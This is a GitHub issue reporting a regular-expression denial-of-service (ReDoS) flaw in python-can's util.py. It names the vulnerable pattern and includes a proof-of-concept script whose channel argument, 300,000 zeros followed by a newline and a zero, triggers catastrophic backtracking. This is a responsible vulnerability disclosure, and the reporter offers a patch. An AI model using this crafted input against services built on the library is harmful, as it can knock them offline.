hardbyte / hardbyte/python-can

A ReDoS vulnerability exists in ./can/util.py

Offen
#1,507 2 Kommentare 0 Reaktionen 0 zugewiesene Personen Auf GitHub ansehen
bug
Vorherrschende Sprache
Python
Sterne
1.6k
Forks
697
PR-Merge-Kennzahlen
Keine gemergten PRs in 30 T.

Beschreibung

The affected code is located in [util.py-line292](https://github.com/hardbyte/python-can/blob/5c523ec9cc5ab3badbb6def6fb3750d228c7c7c0/can/util.py#L292). It uses the vulnerable regular expression `.*?(\d+)$`. When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

```python
import asyncio
from typing import List

import can
from can.notifier import MessageRecipient

def print_message(msg: can.Message) -> None:
"""Regular callback function. Can also be a coroutine."""
print(msg)

async def main() -> None:
"""The main function that runs in the loop."""

with can.Bus(
interface="virtual", channel='0'*300000 + '\n0',receive_own_messages=True
) as bus:
reader = can.AsyncBufferedReader()
logger = can.Logger("logfile.asc")

listeners: List[MessageRecipient] = [
print_message, # Callback function
reader, # AsyncBufferedReader() listener
logger, # Regular Listener object
]
# Create Notifier with an explicit loop to use for scheduling of callbacks
loop = asyncio.get_running_loop()
notifier = can.Notifier(bus, listeners, loop=loop)
# Start sending first message
bus.send(can.Message(arbitration_id=0))

print("Bouncing 10 messages...")
for _ in range(10):
# Wait for next message from AsyncBufferedReader
msg = await reader.get_message()
# Delay response
await asyncio.sleep(0.5)
msg.arbitration_id += 1
bus.send(msg)

# Wait for last message to arrive
await reader.get_message()
print("Done!")

# Clean-up
notifier.stop()

if __name__ == "__main__":
asyncio.run(main())
```

I know this is usually used client side,but when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.

Beitragsleitfaden

Beitragsleitfaden öffnen

Bewertung

Dieses Issue wurde noch nicht bewertet.

Neue Issues direkt in Ihr Postfach

Eine kurze Übersicht über anfängerfreundliche GitHub-Issues.